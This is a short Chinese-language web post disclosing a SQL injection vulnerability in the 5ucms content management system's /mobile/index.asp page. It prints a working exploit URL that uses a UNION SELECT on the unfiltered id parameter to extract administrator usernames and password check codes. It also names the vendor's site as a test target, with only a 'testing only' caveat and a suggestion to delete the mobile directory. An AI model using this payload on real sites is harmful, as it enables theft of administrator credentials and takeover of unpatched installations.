该漏洞在5ucms新版本已修复,仅供学习
漏洞文件:/mobile/index.asp
漏洞说明:未对变量id过滤 导致产生sql注入!
漏洞测试:http://www.5u.hk/ 官方
漏洞证明↓
漏洞EXP↓
/mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20{pre}admin
漏洞修复↓
未知。。。不过可以把mobile目录先删除掉
放手上很久了,没怎么用。就放出来吧。希望只用于测试。不要恶意利用
等待官方解决
上一篇:5ucms编辑器乱码怎么办 5ucms后台编辑器的兼容性解决方案 下一篇:5ucms经常被恶意刷评论怎么办? |
|
本站声明:本网站所载文章等内容,目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。如涉及作品内容、版权及其它问题,请在30日内与本网联系(Email:3876307#qq.com),我们将在第一时间删除内容。若原创内容转载请注明出处。 常见问题: 什么是路径码? 如有问题,请在下方评论提问或加入5ucmsQQ群 5ucms V3 最新版 sql 注入漏洞的关键词:5ucms sql 注入漏洞 |